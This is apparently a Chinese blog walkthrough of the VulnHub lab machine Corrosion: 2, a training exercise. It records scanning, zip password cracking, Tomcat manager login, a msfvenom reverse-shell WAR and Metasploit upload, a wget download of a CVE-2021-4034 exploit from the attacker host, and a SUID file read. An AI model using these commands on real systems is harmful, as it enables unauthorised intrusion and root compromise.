准备
攻击机: kali
靶机: CORROSION: 2 NAT 192.168.91.0 网段
下载连接:
https://www.vulnhub.com/entry/corrosion-2,745/
信息搜集与利用
主机发现
如图所示得到目标靶机IP地址: 192.168.91.189
端口扫描
nmap -sV -O -p- -T4 -A 192.168.91.189 –oN corronsion_nmap.txt
如图所示开放了: 22,80(apache2 default),8080(tomcat) 共三个端口,由此可见这个靶机网页由java构成。根据之前做过的tomcat靶机来说,进入 manager 后台,然后上传war包来反弹shell。
HTTP
http://192.168.91.189/
http://192.168.91.189:8080/
目录扫描
python3 dirsearch.py -u http://192.168.91.189:8080/
可疑文件
从扫描结果出来有一大堆的东西。其中 docs,examples 这两样是tomcat自带的文档和示例。
我们来查看一下 readme.txt 和 backup.zip。
http://192.168.91.189:8080/readme.txt
其中说到,给了一个谁也找不到的文件(放屁)用密码打开此文件,那么就是指 backup.zip 文件,将其下载下来wget http://192.168.91.189:8080/backup.zip
unzip backup.zip
如图所示确实需要密码
密码破解
zip2john backup.zip > password_hash.txt
john –wordlist=/usr/share/wordlists/rockyou.txt password_hash.txt
如图所示得到密码:@administrator_hi5
,很快就出来了。
现在解压
unzip backup.zip
如图所示解压成功,很多文件
经过一番查找在 tomcat-users.xml 文件最下面发现了用户名和密码:
manager:melehifokivai
admin:melehifokivai
这两个用户名都能登陆 tomcat 后台,分别用两个浏览器登陆。
既然登陆了后台,我们尝试上传一个 war 包然后反弹shell.
制作 war 包可以看我以前的博客
msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.27.243.168 LPORT=4444 -f war > shell.war
kali 开启 nc 监听,然后上传(将 shell.war 拷贝到 win11中)
nc -lvnp 4444
去她娘的 404, 看来这个方法不得行。md。之后发现 msfconsole 中有一个可以 getshell 的模块配合账号密码即可。
use exploit/multi/http/tomcat_mgr_upload
设置红框的内容即可,账号密码在上面已经拿到。然后** run **
run 之后,输入 shell 进入 shell 可疑看到为 tomcat 用户。
python3 -c “import pty;pty.spawn(’/bin/bash’)”
输入此命令得到标准的终端
参考一下文章
flag 1
在目录 /home/randy 中有第一个 flag : user.txt
/home/randy/note.txt
嘿,兰迪,这是你的系统管理员,希望你今天过得愉快!我只是想让你知道
我更改了你对主目录的权限。您暂时无法删除或添加文件。
稍后我将更改这些权限。
下周一见randy!
查看一下 /etc/passwd 中可存在的用户
方法一
发现 jaye 用户的密码和 manager 的密码一样都是 : melehifokivai
find / -perm -u=s -type f 2>/dev/null
查找 具有 SUID 的命令发现了一个熟悉的: polkit-agent-helper-1 cve编号:
CVE-2021-4034
exp连接:
https://github.com/berdav/CVE-2021-4034
发现靶机上没有 git 命令,但是可以用 wget 替代,最后发现还没有 make 命令,那么编译不了,但是我们可以在kali上将已经编译好的文件,下载到靶机中,然后运行,以后遇到类似的直接上传已经编译好的文件。
将编译好的文件下载到靶机中:
wget http://172.27.243.168:8000/CVE-2021-4034.zip
然后解压
unzip CVE-2021-4034.zip
然后进入 CVE-2021-4034文件夹,运行 ./cve-2021-4034,不出意外的话就会拿到 root 权限
如图所示拿到了root 权限,至此又又又通过 CVE-2021-4034 提权成功,不亏是存在了十多年的漏洞!!!
flag 2
方法二
jaye:melehifokivai ssh 登陆后,在其家目录下 Files 中有 look 命令,可以越权访问文件:
./look ‘’ ‘/root/root.txt’
如图所示直接读取第二个 flag , 如果在比赛中直接提交 flag 即可得分。
方法三
参考大佬的博客:
https://www.cnblogs.com/sainet/p/15668420.html#三提权
我这里测试失败,可能是我的原因
总结
- CVE-2021-4034
- look 越权读取文件
- msfconsole use exploit/multi/http/tomcat_mgr_upload getshell
暂无评论内容